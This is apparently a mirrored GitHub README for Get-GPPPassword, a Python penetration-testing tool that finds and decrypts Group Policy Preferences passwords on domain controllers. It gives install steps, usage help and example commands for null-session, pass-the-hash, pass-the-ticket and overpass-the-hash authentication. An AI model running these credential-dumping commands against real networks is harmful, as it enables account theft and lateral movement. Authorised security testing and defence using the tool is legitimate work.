Giters

ShutdownRepo / Get-GPPPassword

Python script for extracting and decrypting Group Policy Preferences passwords

Home Page:https://www.thehacker.recipes/active-directory-domain-services/movement/credentials/dumping/group-policies-preferences

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

⚠️ THIS REPO IS DISCONTINUED SINCE IT HAS BEEN OFFICIALLY ADDED TO IMPACKET. IT WILL ONLY BE MAINTAINED THERE ⚠️

Get-GPPPassword

Python script for extracting and decrypting Group Policy Preferences passwords, using Impacket's lib, and using streams for carving files instead of mounting shares

example GIF

Install

This script can be run in standalone (python3 -m pip install -r requirements.txt) or added in Impacket (cd /path/to/impacket; cp Get-GPPPassword.py examples/; python3 -m pip install .).

Examples

NULL session

python3 Get-GPPPassword.py -no-pass domain_controller

Username, password

python3 Get-GPPPassword.py domain.local/someuser:somepassword@domain_controller

Pass-the-hash

python3 Get-GPPPassword.py -hashes [LMhash]:NThash domain.local/someuser@domain_controller

Pass-the-ticket

export KRB5CCNAME=someuser.ccache
python3 Get-GPPPassword.py -k domain_controller

Pass-the-key

python3 Get-GPPPassword.py -aesKey aesKey domain.local/someuser@domain_controller

Overpass-the-hash

python3 Get-GPPPassword.py -k -hashes [LMhash]:NThash domain.local/someuser@domain_controller

Usage

usage: Get-GPPPassword.py [-h] [-share SHARE] [-base-dir BASE_DIR] [-ts]
                          [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                          [-aesKey hex key] [-dc-ip ip address]
                          [-target-ip ip address] [-port [destination port]]
                          target

Group Policy Preferences passwords finder and decryptor

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

optional arguments:
  -h, --help            show this help message and exit
  -share SHARE          SMB Share
  -base-dir BASE_DIR    Directory to search in (Default: /)
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it
                        will use the domain part (FQDN) specified in the
                        target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it
  -port [destination port]
                        Destination port to connect to SMB Server

Credits

Thanks to :

About

Python script for extracting and decrypting Group Policy Preferences passwords

https://www.thehacker.recipes/active-directory-domain-services/movement/credentials/dumping/group-policies-preferences

License:GNU General Public License v3.0

Languages

Language:Python 100.0%